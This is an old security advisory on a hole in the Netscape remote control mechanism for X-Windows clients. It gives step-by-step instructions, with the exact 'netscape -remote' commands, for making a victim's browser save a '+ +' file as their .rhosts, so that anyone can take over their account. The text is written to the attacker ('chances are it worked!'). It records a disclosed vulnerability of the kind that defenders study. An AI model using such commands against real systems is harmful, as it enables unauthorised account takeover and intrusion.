COMMAND

    netscape

PROBLEM

    There's a huge hole in  the Netscape remote control mechanism  for
    the  X-Windows  based  clients.   Potential  impact  : anybody can
    become  any  user  that  uses  Netscape  on  any  system   without
    sufficient X security.

    Let's suppose that you have an account on a target machine,  where
    somebody  is  using  Netscape,  and  either  the xhost checking is
    disabled, or you can set the  xhost yourself (e.g. if you have  an
    account and the target user has no .Xauthority, as is frequent  in
    university  computer  rooms).   Then  you  can  gain access to the
    target user's account using the following steps :

    - make a text file containing  only "+ +" accessible (as file,  as
      URL, or whatever you like)  to the target Netscape client.  This
      is  quite  easy,  either  if  you  have  a  personal  WWW   page
      (http://...   URL)   or  an  account   on  the  target   machine
      (file://... URL), or even by uploading it to an anon FTP

    - set your DISPLAY environment variable to the target display

    - run the following set of commands :

      netscape -noraise -remote "openURL(<put-your-URL-here>)"
      netscape -noraise -remote "saveAs(.rhosts)"
      netscape -noraise -remote back

    In  the  second  command,  the  path  should be specified whenever
    possible (~ is not accepted).

    If the  target user  does not  already have  a .rhosts  and is not
    looking at that precise moment, then the chances are it worked!